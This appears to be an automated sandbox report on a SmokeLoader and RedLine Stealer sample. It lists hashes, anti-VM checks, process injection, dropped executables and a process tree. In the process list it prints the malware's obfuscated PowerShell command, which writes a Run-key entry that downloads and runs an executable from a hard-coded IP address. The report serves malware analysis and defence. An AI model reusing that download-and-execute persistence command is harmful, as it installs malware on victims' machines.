Analysis
max time kernel: 150s
max time network: 198s
platform: windows7_x64
resource: win7v20210410
submitted: 13-08-2021 06:45

Static task static1
Behavioral task behavioral1
  Sample: 3da56853cea772e7f90f92c66d8c0a31.exe
  Resource: win7v20210410
Behavioral task behavioral2
  Sample: 3da56853cea772e7f90f92c66d8c0a31.exe
  Resource: win10v20210408
General
Target: 3da56853cea772e7f90f92c66d8c0a31.exe
Size: 320KB
MD5: 3da56853cea772e7f90f92c66d8c0a31
SHA1: 45a659f9006fb9703a1fef5fc9044a84788228ef
SHA256: 776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a
SHA512: 0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8
Malware Config
Extracted
  Family: smokeloader
  Version: 2020
Signatures
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
SmokeLoader
  Modular backdoor trojan in use since 2014.
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
Identifies VirtualBox via ACPI registry values (likely anti-VM)  [2 TTPs]
Downloads MZ/PE file
Executes dropped EXE  [6 IoCs]
  pid   process
  956   E012.exe
  552   E448.exe
  1112  Runtimebroker.exe
  1472  E736.exe
  1572  EBC9.exe
  788   F5E7.exe
Checks BIOS information in registry  [2 TTPs, 2 IoCs]
  BIOS information is often read in order to detect sandboxing environments.
  description        ioc                                                              process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  F5E7.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   F5E7.exe
Deletes itself  [1 IoC]
  pid   process
  1292  (no process name reported)
Drops startup file  [2 IoCs]
  description                   ioc                                                                                        process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  cmd.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  cmd.exe
Loads dropped DLL  [2 IoCs]
  pid   process
  552   E448.exe
  552   E448.exe
YARA match: themida
  resource                                                                     yara_rule
  C:\Users\Admin\AppData\Local\Temp\F5E7.exe                                   themida
  behavioral1/memory/788-94-0x00000000001D0000-0x00000000001D1000-memory.dmp  themida
Checks whether UAC is enabled
  description        ioc                                                                                process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  F5E7.exe
Suspicious use of NtSetInformationThreadHideFromDebugger  [1 IoC]
  pid   process
  788   F5E7.exe
Suspicious use of SetThreadContext  [1 IoC]
  description                          pid   process                               target process
  PID 1672 set thread context of 1384  1672  3da56853cea772e7f90f92c66d8c0a31.exe  3da56853cea772e7f90f92c66d8c0a31.exe
Checks SCSI registry key(s)  [3 TTPs, 3 IoCs]
  SCSI information is often read in order to detect sandboxing environments.
  description     ioc                                               process
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3da56853cea772e7f90f92c66d8c0a31.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3da56853cea772e7f90f92c66d8c0a31.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3da56853cea772e7f90f92c66d8c0a31.exe
Suspicious behavior: EnumeratesProcesses  [64 IoCs]
  pid   process
  1384  3da56853cea772e7f90f92c66d8c0a31.exe  (2 entries)
  1292  (no process name reported; repeated for the remaining entries)
Suspicious behavior: GetForegroundWindowSpam  [1 IoC]
  pid   process
  1292  (no process name reported)
Suspicious behavior: MapViewOfSection  [1 IoC]
  pid   process
  1384  3da56853cea772e7f90f92c66d8c0a31.exe
Suspicious use of AdjustPrivilegeToken  [3 IoCs]
  description                 pid   process
  Token: SeShutdownPrivilege  1292  (no process name reported)
  Token: SeShutdownPrivilege  1292  (no process name reported)
  Token: SeDebugPrivilege     788   F5E7.exe
Suspicious use of FindShellTrayWindow  [4 IoCs]
  pid   process
  1292  (no process name reported; 4 entries)
Suspicious use of SendNotifyMessage  [6 IoCs]
  pid   process
  1292  (no process name reported; 6 entries)
Suspicious use of SetWindowsHookEx  [1 IoC]
  pid   process
  956   E012.exe
Suspicious use of WriteProcessMemory  [42 IoCs]
  (identical rows collapsed; the entries column gives how often each row appears; "-" means no process name was reported for that pid)
  description                       pid   process                               target process                        entries
  PID 1672 wrote to memory of 1384  1672  3da56853cea772e7f90f92c66d8c0a31.exe  3da56853cea772e7f90f92c66d8c0a31.exe  7
  PID 1292 wrote to memory of 956   1292  -                                     E012.exe                              4
  PID 1292 wrote to memory of 552   1292  -                                     E448.exe                              4
  PID 552 wrote to memory of 1112   552   E448.exe                              Runtimebroker.exe                     4
  PID 1292 wrote to memory of 1472  1292  -                                     E736.exe                              4
  PID 1292 wrote to memory of 1572  1292  -                                     EBC9.exe                              4
  PID 1292 wrote to memory of 788   1292  -                                     F5E7.exe                              7
  PID 1112 wrote to memory of 1220  1112  Runtimebroker.exe                     powershell.exe                        4
  PID 1472 wrote to memory of 656   1472  E736.exe                              cmd.exe                               4
Processes
(indentation shows the parent/child depth reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\E012.exe
  command line: C:\Users\Admin\AppData\Local\Temp\E012.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\E448.exe
  command line: C:\Users\Admin\AppData\Local\Temp\E448.exe
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
    C:\ProgramData\Runtimebroker.exe
      command line: "C:\ProgramData\Runtimebroker.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'

C:\Users\Admin\AppData\Local\Temp\E736.exe
  command line: C:\Users\Admin\AppData\Local\Temp\E736.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
      - Drops startup file

C:\Users\Admin\AppData\Local\Temp\EBC9.exe
  command line: C:\Users\Admin\AppData\Local\Temp\EBC9.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\F5E7.exe
  command line: C:\Users\Admin\AppData\Local\Temp\F5E7.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads